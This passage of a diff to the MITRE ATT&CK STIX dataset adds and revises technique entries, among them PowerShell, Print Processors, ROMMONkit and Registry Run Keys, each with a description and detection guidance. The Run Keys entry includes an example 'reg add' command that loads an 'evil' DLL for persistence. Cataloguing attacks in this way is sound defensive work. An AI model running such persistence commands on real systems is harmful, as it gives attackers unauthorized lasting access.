"x_mitre_platforms": [ - "Linux", - "macOS", - "Windows", - "SaaS", - "Office 365" + "PRE" ] }, { @@ -20172,9 +23332,9 @@ "phase_name": "command-and-control" } ], - "modified": "2020-07-01T18:23:25.002Z", + "modified": "2020-10-21T01:26:31.804Z", "created": "2020-07-01T18:23:25.002Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "User" @@ -20187,7 +23347,8 @@ "x_mitre_platforms": [ "Linux", "macOS", - "Windows" + "Windows", + "Network" ] }, { @@ -20395,6 +23556,22 @@ "created": "2017-05-31T21:31:06.512Z" }, { + "created": "2020-03-09T13:48:55.078Z", + "modified": "2020-06-24T13:51:22.360Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", + "name": "PowerShell", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -20437,30 +23614,12 @@ "source_name": "FireEye PowerShell Logging 2016" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "PowerShell", - "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", - "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "execution" - } + "x_mitre_contributors": [ + "Praetorian" ], - "modified": "2020-06-24T13:51:22.360Z", - "created": "2020-03-09T13:48:55.078Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_permissions_required": [ - "User", - "Administrator" - ], - "x_mitre_remote_support": true, - "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.", "x_mitre_data_sources": [ "Windows event logs", "Process monitoring", @@ -20470,12 +23629,14 @@ "File monitoring", "DLL monitoring" ], - "x_mitre_contributors": [ - "Praetorian" + "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.", + "x_mitre_remote_support": true, + "x_mitre_permissions_required": [ + "User", + "Administrator" ], - "x_mitre_platforms": [ - "Windows" - ] + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "external_references": [ @@ -20616,11 +23777,12 @@ "phase_name": "persistence" } ], - "modified": "2020-05-19T21:22:38.174Z", + "modified": "2020-10-22T16:35:54.740Z", "created": "2019-11-13T14:44:49.439Z", "x_mitre_platforms": [ "Linux", - "Windows" + "Windows", + "Network" ], "x_mitre_data_sources": [ "VBR", @@ -20641,10 +23803,69 @@ "Host intrusion prevention systems", "File monitoring" ], - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)", "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1547.012", + "url": "https://attack.mitre.org/techniques/T1547/012" + }, + { + "source_name": "Microsoft AddPrintProcessor May 2018", + "url": "https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor", + "description": "Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020." + }, + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Print Processors", + "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. \n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", + "id": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "modified": "2020-10-09T16:05:36.344Z", + "created": "2020-10-05T13:24:49.780Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.", + "x_mitre_data_sources": [ + "Process monitoring", + "Windows Registry", + "File monitoring", + "DLL monitoring", + "API monitoring" + ], + "x_mitre_contributors": [ + "Mathieu Tartare, ESET" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", "name": "Private Keys", @@ -20833,10 +24054,18 @@ ] }, { - "id": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Process Discovery", - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.", + "created": "2017-05-31T21:30:48.728Z", + "modified": "2020-03-26T18:05:53.130Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -20849,39 +24078,31 @@ "url": "https://capec.mitre.org/data/definitions/573.html" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.", + "name": "Process Discovery", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "API monitoring", + "Process monitoring", + "Process command-line parameters" ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "discovery" - } - ], - "modified": "2020-03-26T18:05:53.130Z", - "created": "2017-05-31T21:30:48.728Z", - "x_mitre_is_subtechnique": false, - "x_mitre_system_requirements": [ - "Administrator, SYSTEM may provide better process ownership details" + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], "x_mitre_permissions_required": [ "User", "Administrator", "SYSTEM" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" + "x_mitre_system_requirements": [ + "Administrator, SYSTEM may provide better process ownership details" ], - "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", - "x_mitre_data_sources": [ - "API monitoring", - "Process monitoring", - "Process command-line parameters" - ], - "x_mitre_version": "1.2" + "x_mitre_is_subtechnique": false }, { "id": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", @@ -21275,10 +24496,9 @@ ] }, { - "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Proxy", - "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -21296,9 +24516,10 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "name": "Proxy", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "type": "attack-pattern", "kill_chain_phases": [ { @@ -21306,15 +24527,14 @@ "phase_name": "command-and-control" } ], - "modified": "2020-06-20T20:53:20.670Z", + "modified": "2020-10-21T17:54:28.531Z", "created": "2017-05-31T21:31:08.479Z", - "x_mitre_is_subtechnique": false, - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Brian Prange", + "Heather Linn", + "Walker Johnson" ], - "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", "x_mitre_data_sources": [ "SSL/TLS inspection", "Process use of network", @@ -21322,12 +24542,14 @@ "Netflow/Enclave netflow", "Packet capture" ], - "x_mitre_contributors": [ - "Brian Prange", - "Heather Linn", - "Walker Johnson" + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" ], - "x_mitre_version": "3.0" + "x_mitre_is_subtechnique": false }, { "external_references": [ @@ -21449,6 +24671,42 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1597.002", + "url": "https://attack.mitre.org/techniques/T1597/002" + }, + { + "source_name": "ZDNET Selling Data", + "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/", + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Purchase Technical Data", + "description": "Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim\u2019s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "id": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:15:26.840Z", + "created": "2020-10-02T17:05:43.562Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -21606,6 +24864,60 @@ "Windows" ] }, + { + "created": "2020-10-20T00:05:48.790Z", + "modified": "2020-10-22T02:18:19.568Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "name": "ROMMONkit", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1542.004", + "url": "https://attack.mitre.org/techniques/T1542/004" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_data_sources": [ + "File monitoring", + "Netflow/Enclave netflow", + "Network protocol analysis", + "Packet capture" + ] + }, { "external_references": [ { @@ -21749,6 +25061,53 @@ "x_mitre_is_subtechnique": true, "x_mitre_version": "1.0" }, + { + "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", + "name": "Reduce Key Space", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1600.001", + "url": "https://attack.mitre.org/techniques/T1600/001" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-21T22:36:22.369Z", + "created": "2020-10-19T19:03:48.310Z", + "x_mitre_data_sources": [ + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" + }, { "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -21830,6 +25189,11 @@ "external_id": "T1498.002", "url": "https://attack.mitre.org/techniques/T1498/002" }, + { + "external_id": "CAPEC-490", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/490.html" + }, { "source_name": "Cloudflare ReflectionDoS May 2017", "url": "https://blog.cloudflare.com/reflections-on-reflections/", @@ -21875,7 +25239,7 @@ "phase_name": "impact" } ], - "modified": "2020-03-23T12:55:30.119Z", + "modified": "2020-09-16T15:58:18.490Z", "created": "2020-03-02T20:08:03.691Z", "x_mitre_data_sources": [ "Sensor health and status", @@ -21885,7 +25249,7 @@ "Network device logs" ], "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_impact_type": [ "Availability" @@ -21959,6 +25323,16 @@ "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", "source_name": "Microsoft Run Key" }, + { + "source_name": "Microsoft Wow6432Node 2018", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry", + "description": "Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020." + }, + { + "source_name": "Malwarebytes Wow6432Node 2016", + "url": "https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/", + "description": "Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020." + }, { "url": "https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key", "description": "Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.", @@ -21980,7 +25354,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Registry Run Keys / Startup Folder", - "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* 